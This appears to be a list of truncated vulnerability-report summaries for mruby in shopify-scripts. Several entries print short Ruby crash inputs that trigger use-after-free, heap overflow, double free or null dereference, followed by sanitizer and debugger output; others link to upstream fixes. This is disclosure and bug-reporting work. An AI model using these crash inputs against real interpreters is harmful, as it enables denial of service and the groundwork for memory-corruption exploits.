shopify-scripts: Invalid read in `str_replace_partial`
PoC === The attached POC shows an invalid read. Debug info ========== The issue happens when memmove is called inside str_replace_partial. valgrind report: ==27051== Invalid read of size 1 ==27051== at 0x483FA10: memmove (vg_replace_strmem.c:1270) ==27051== by 0x135D60: str_replace_partial (string.c:1193)...
shopify-scripts: NULL pointer dereference in `mrb_check_frozen`
PoC === The following demonstrates a crash: 3735928559.remove_instance_variable '@a' Debug info ========== Valgrind suggests the crash happens due to an invalid read in mrb_check_frozen: ==4882== Memcheck, a memory error detector ==4882== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al...
shopify-scripts: SEGV on ary_concat
The following input demonstrates a crash: def z return begin 0.each do return end rescue = x ensure x.backtrace end end z ASAN report ./mruby/bin/mruby asd.rb ASAN:DEADLYSIGNAL ================================================================= ==43761==ERROR: AddressSanitizer: SEGV on unknown...
shopify-scripts: Invalid read leading to a segfault
PoC === The attached POC demonstrates invalid reads leading to a segfault. Debug info ========== gdb report: 423│ dispatch_linked(codegen_scope *s, int pc) 424│ { 425│ mrb_code i; 426│ int pos; 427│ 428│ if (!pc) return; 429│ for (;;) { 430├─── i = s->iseq[pc]; (gdb) p pc $1 = -32730 valgrind report: ==21952==...
shopify-scripts: heap-use-after-free in OP_RESCUE
The following input demonstrates a crash: def e proc ensure z rescue yield end e Class def x new Class 0 ensure 0 = 00end rescue 0 rescue z ASAN report ./mruby/bin/mruby out.rb ================================================================= ==10040==ERROR: AddressSanitizer: heap-use-after-free ...
shopify-scripts: Heap Overflow in fiber_switch triggered from Fiber.transfer
It appears as if my recommendations were ignored in the GitHub issue, so I've repeated the issue here. PoC Fiber.new.transfer 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0 Explanation The cause of this is th...
shopify-scripts: heap-use-after-free in mrb_vm_exec - vm.c:1247
The following input causes a heap-use-after-free in mrb_vm_exec (vm.c:1247): g=0.times.p a %w0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ...
shopify-scripts: heap use after free in fiber_switch
@ssarong reported an input that triggers a heap use-after-free: https://github.com/mruby/mruby/issues/3619 The issue was addressed upstream in https://github.com/mruby/mruby/commit/15fba69710c7395b4e9523edb191ef84f672fa28...
shopify-scripts: Null pointer dereferences in kh_copy_mt
@ssarong reported an input that triggers a null pointer dereference: https://github.com/mruby/mruby/pull/3615 The issue was addressed in https://github.com/mruby/mruby/commit/de969942338ac440294eefb2e7846a6975f4efdd...
shopify-scripts: Invalid Pointer reference in L_RESCUE
@ssarong reported an input that triggers an out-of-bounds read: https://github.com/mruby/mruby/issues/3603 This issue was addressed upstream in https://github.com/mruby/mruby/commit/761493934e19d1a6edea53e9fbdb39eb78ef898e...
shopify-scripts: heap use-after-free in mrb_vm_exec()
The code below triggers a heap use-after-free vulnerability: class M def M.newr super new0 end end M.new0 ASAN report : ================================================================= ==25617==ERROR: AddressSanitizer: heap-use-after-free on address 0xf4103e50 at pc 0x080f7231 bp 0xffc69ab8 sp...
shopify-scripts: Crash in ary_concat()
The code above raises a segmentation fault both in mruby and mruby-engine N case when nil -do end def eend end ASAN report : line 1:3: '' interpreted as argument prefix ASAN:SIGSEGV ================================================================= ==111090==ERROR: AddressSanitizer: SEGV on unknow...
shopify-scripts: Null pointer dereferences in mrb_get_args
@ssarong reported a null pointer dereference in MRuby: https://github.com/mruby/mruby/issues/3559 The issue was corrected in https://github.com/mruby/mruby/commit/dcbfe7162586eb46e583cb140f4f6cde7ae2b87a...
shopify-scripts: SIGABRT in mrb_debug_info_append_file
PoC ------------------- The following code triggers the bug attached as testmrbdebuginfoappendfile.rb: i""do"".+end mirb ------------------- x@x:/Desktop/test/mruby/bin$ ./mirb testmrbdebuginfoappendfile.rb mirb - Embeddable Interactive Ruby Shell mirb: /home/x/Desktop/test/mruby/src/debug.c:136:...
shopify-scripts: Null pointer dereference in mrb_class
PoC === The following demonstrates a crash: if def class A ensure e rescue 0 end end .map.a Debug info ========== The crash happens due to a null pointer dereference in mrb_class, class.h:50. 50├ return mrb_obj_ptr(v)->c; Valgrind shows several reads inside free'd blocks. Test platform =============...
shopify-scripts: SIGSEGV in mrb_class
PoC ------------------- Attached as testmrbclass.rb: Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. 0x0000000000402ef2 in mrb_class (mrb=0x6b0010, v=...) at /home/x/Desktop/test/mruby/include/mruby/class.h:50 50 return mrb_obj_ptr(v)->c; (gdb) l 45 case MRB_TT_CPTR: 46...
shopify-scripts: SIGSEGV in mrb_vm_exec
PoC ------------------- The following code triggers the bug attached as testmrbvmexec.rb: s=proc|f,g,x|fxgx.curry k=proc|x,y|x.curry i=proc|x|x.curry fi0= re0=proc|x|fi0.size;x.curry ssiiki0sskssksssksskskre0skskkksksk Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb...
shopify-scripts: SIGABRT - mirb - Double Free
PoC ------------------- Attached as test.rb Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb - Embeddable Interactive Ruby Shell NoMethodError: undefin...
shopify-scripts: Null pointer dereferences in ary_concat
@ssarong reported a null pointer dereference in MRuby: https://github.com/mruby/mruby/issues/3532 The issue was corrected in https://github.com/mruby/mruby/commit/d35fcf1ea2bfc3933b2f2543265874669feeee95...
shopify-scripts: SIGABRT - mirb and mruby
PoC ------------------- The following code triggers the bug attached as test.rb: def method_missing(m,e) self.ff||=00end e Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb Reading symbols from ./mirb...done. (gdb) r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mi...